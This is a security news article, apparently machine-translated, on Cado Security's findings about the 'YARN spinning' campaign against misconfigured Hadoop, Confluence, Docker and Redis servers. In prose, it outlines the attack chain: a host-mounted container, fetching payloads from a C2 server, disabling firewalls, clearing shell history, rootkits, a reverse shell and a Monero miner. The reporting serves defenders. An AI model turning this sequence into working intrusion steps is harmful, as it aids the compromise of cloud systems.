Researchers have identified a concerted cyber compromise campaign targeting cloud servers running vulnerable instances of Apache Hadoop, Atlassian Confluence, Docker, and Redis. The attackers are abandoning a cryptomining tool, but they are also installing a Linux-based reverse shell that would enable potential future targets and malware infestations.
According to an analysis by Cado Security, in most cases the adversary is looking for common cloud misconfigurations to exploit. However, it also used an old RCE (Remote Code Execution) vulnerability in the Confluence server (CVE-2022-26134) in its current campaign.
The researchers also said that the attackers’ tactics overlap with TeamTNT and WatchDog, two threat groups known for targeting cloud and container environments.
“Attacks are relatively coded and automated, so they look for known vulnerabilities in Confluence and other platforms and well-known misconfigurations in platforms like Redis and Docker,” says Chris Doman, co-founder and CTO of Cado Security.
Identifying these vulnerable instances is often simple, as it relies on scanning as the first step and attacking the identified vulnerable instances as the second step. “Avoiding these problems often means fixing the problems at hand by making sure systems are patched or at least not accessible over the Internet.”
“Rotating” YARN cyberattacks target cloud servers
Cado Security researchers have nicknamed the campaign YARN spinning, after the Apache Hadoop “Yet Another Resource Negotiator” cluster resource management layer. They discovered this while investigating a flurry of initial login activity on one of Cado’s Docker honeypots. Their analysis led to the discovery of four previously unknown Golang binaries that the threat actor is using to automate the detection and compromise of servers running the four cloud platforms.
Cado researchers also discovered that the threat actor distributed several other unique payloads, including Platypus (an open source reverse shell utility to maintain persistence) and two user-mode rootkits to obfuscate malicious processes.
“Once initial access is gained, a number of shell scripts and general Linux attack techniques are used deliver a cryptocurrency minergenerate a reverse shell and allow persistent access to compromised hosts,” the company said in a blog post this week.
The ongoing campaign is the latest manifestation of the time and effort threat actors appear to be dedicating to understanding vulnerabilities in web-facing services in cloud environments and finding ways to exploit them for initial access, the security provider. Since the start of 2024, Cado researchers have observed a total of three campaigns, including the latest, in which a threat actor leveraged Docker for initial access to an organization’s larger cloud environment, it noted the company.
Many of these attacks involved attempts to deploy cryptominers. Earlier this year, researchers at Aqua Nautilus reported an exploitation by a threat actor two known configuration errors in Hadoop YARN and Flink to release a miner for the Monero cryptocurrency. That campaign, like the one Cado reported this week, involved the use of rootkits, system configuration changes, compressed ELF binaries, and other methods to evade detection. Last year, Aqua researchers discovered another campaign in which a threat actor infected over 1,200 Redis servers with a cryptominer via a nearly undetectable malware tool they dubbed “HeadCrab.”
In the cloud with a multi-stage attack chain
In the Cado Docker honeypot attack, threat actors issued a Docker command from a US IP address that generated a new container with a configuration that allowed the container to access and interact with files and directories on the underlying host system. It’s a method that adversaries commonly use in Docker attacks because it allows them to write files to the host system or essentially conduct an RCE attack, Cado said.
In this particular case, the attackers adopted the tactic of writing a shell script function that established contact with a remote command and control (C2) server, and then retrieved a first-stage payload from it.
The function of the first phase payload is to define the C2 for additional payloads and check for chattr, a Linux tool for changing file and directory attributes. If the tool is present, the initial payload renames it. Otherwise, the malware installs chattr on the compromised system and then renames it, Cado said. That primary or first-stage payload then fetches the next payload after checking whether the current system user has administrator access.
Second stage payload functions include softening the system for further compromises by, among other things, executing commands to disable firewall and IP filtering rules, clearing shell history, disabling access control functions, and removing any restrictions on outgoing DNS requests.
The second-stage shell script also takes various anti-forensic measures such as installing two user-mode rootkits to hide malicious activities and ensure that malicious commands do not appear in the history file. Also download Platypus for persistent access and XMRig cyptominer for Monero.
The attack chain also includes shell scripts to search and delete Docker images from Ubuntu or Alpine repositories and to download and persist numerous other binary payloads on compromised systems.